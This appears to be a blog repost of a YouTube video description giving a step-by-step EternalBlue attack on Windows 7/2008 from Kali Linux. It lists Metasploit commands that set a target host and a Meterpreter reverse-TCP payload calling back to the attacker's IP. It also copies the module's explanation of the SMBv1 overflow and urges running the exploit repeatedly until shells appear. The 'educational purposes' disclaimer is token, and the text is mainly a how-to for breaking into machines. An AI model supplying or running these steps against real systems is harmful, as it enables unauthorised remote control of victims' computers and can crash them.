How to exploit Windows 7/2008 using eternalblue with Kali Linux 2018.2

z1UBz-0YQx4/default.jpg

How to exploit Windows 7/2008 using eternalblue with Kali Linux 2018.2
!!! ONLY FOR EDUCATIONAL PURPOSES !!!
commands:
msfconsole
set rhost targetip
set payload windows/x64/meterpreter/reverse_tcp
set lhost yourip
exploit
...
Description:
This module is a port of the Equation Group ETERNALBLUE exploit,
part of the FuzzBunch toolkit released by Shadow Brokers. There is a
buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
where a DWORD is subtracted into a WORD. The kernel pool is groomed
so that overflow is well laid-out to overwrite an SMBv1 buffer.
Actual RIP hijack is later completed in
srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
not trigger 100% of the time, and should be run continuously until
triggered. It seems like the pool will get hot streaks and need a
cool down period before the shells rain in again. The module will
attempt to use Anonymous login, by default, to authenticate to
perform the exploit. If the user supplies credentials in the
SMBUser, SMBPass, and SMBDomain options it will use those instead.
On some systems, this module may cause system instability and
crashes, such as a BSOD or a reboot. This may be more likely with
some payloads.

To hack Windows 7/2008 32 bit:
https://www.youtube.com/watch?v=goUVg...

THANK YOU FOR WATCHING
SUBSCRIBE
SHARE
LIKE
FOLLOW US ON INSTAGRAM
https://www.instagram.com/kali_linux_...
FOLLOW US ON TWITTER
https://twitter.com/KALILINUXTRICKS

z1UBz-0YQx4/default.jpg
How to exploit Windows 7/2008 using eternalblue with Kali Linux 2018.2 How to exploit Windows 7/2008 using eternalblue with Kali Linux 2018.2 Reviewed by Anonymous on July 21, 2018 Rating: 5